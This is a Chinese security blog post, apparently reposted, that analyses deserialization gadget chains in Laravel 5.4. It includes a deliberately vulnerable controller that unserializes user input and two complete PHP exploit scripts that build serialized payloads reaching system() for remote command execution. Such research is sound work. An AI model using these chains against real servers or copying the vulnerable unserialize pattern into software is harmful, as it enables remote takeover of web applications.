laravel5.4反序列化

前言

laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)

环境搭建

laravel5.4部署

composer create-project laravel/laravel=5.4 laravel5-4 --prefer-dist
cd laravel5-4
php artisan serve

访问http://127.0.0.1:8000

添加路由
routes/web.php

Route::get(‘/seri‘, "SeriController@seri");

添加控制器
app/Http/Controllers/SeriController.php

<?php
namespace App\Http\Controllers;

class SeriController extends Controller
{
    public function seri()
    {
        if (isset($_GET[‘code‘])){
            $code = $_GET[‘code‘];
            unserialize($code);
        }
        else{
            highlight_file(__FILE__);
        }

        return "The laravel version is 5.4!";
    }
}

?>

访问路径
http://127.0.0.1:8000/seri

漏洞分析

找__destruct()方法

src/Illuminate/Broadcasting/PendingBroadcast.php

这里$this->events和$this->event都是可控的

找可利用的__call()方法

Generator.php

src/Faker/Generator.php

分析

查找format()方法

$arguments就是我们传入的可控参数，$this->getFormatter($formatter)返回system时可 rce
查看getFormatter()方法

这里$this->formatters可控
直接返回$this->formatters[$formatter]，而$formatter就是dispatch
所以可以构造$this->formatters = [‘dispatch‘ => ‘system‘]可以满足要求

复现

//exp_1.php

<?php

namespace Illuminate\Broadcasting
{
	use Faker\Generator;
	class PendingBroadcast
	{
		protected $events;
		protected $event;
		public function __construct($cmd)
		{
			$this->event = $cmd;
			$this->events = new Generator;
		}
	}
	$seri = new PendingBroadcast(‘whoami‘);
	echo base64_encode(serialize($seri));
}

namespace Faker
{
	class Generator
	{
		protected $formatters = array();
		public function __construct()
		{
			$this->formatters = array(‘dispatch‘ => ‘system‘);
		}
	}
}

?>

但是提交时报错

原因在于PendingBroadcast.php存在__wake()方法

注释掉该方法继续执行

成功执行命令

Manager.php

src/Illuminate/Support/Manager.php

分析

进入driver()方法

先查看createDriver()方法

在 callCustomCreator()方法中是一个可变函数
而且$this->customCreators和$this->app可控制

返回看$driver怎么来的

getDefaultDriver()方法是一个 abstract 抽象方法，需要找它的继承子类重写

转到ChannelManager.php文件
src/Illuminate/Notifications/ChannelManager.php

查看getDefaultDriver()方法
这时候就可以令$driver可控了

最后只要令$this->customCreators[$driver] = ‘system‘|$this->app = ‘whoami‘即可执行命令

复现

//exp_2.php
<?php
namespace Illuminate\Broadcasting
{
	use Illuminate\Notifications\ChannelManager;
	class PendingBroadcast
	{
		protected $events;
		public function __construct($cmd)
		{
			$this->events = new ChannelManager($cmd);
		}
	}
	$seri = new PendingBroadcast(‘whoami‘);
	echo base64_encode(serialize($seri));
}

namespace Illuminate\Notifications
{
	class ChannelManager
	{
		protected $app;
		protected $defaultChannel;
		protected $customCreators;
		public function __construct($cmd)
		{
			$this->defaultChannel = ‘shivers‘;
			$this->customCreators = array(‘shivers‘ => ‘system‘); 
			$this->app = $cmd;
		}
	}
}
?>

可以执行命令

参考

https://xz.aliyun.com/t/9478

laravel5.4反序列化

原文：https://www.cnblogs.com/shivers0x72/p/14800109.html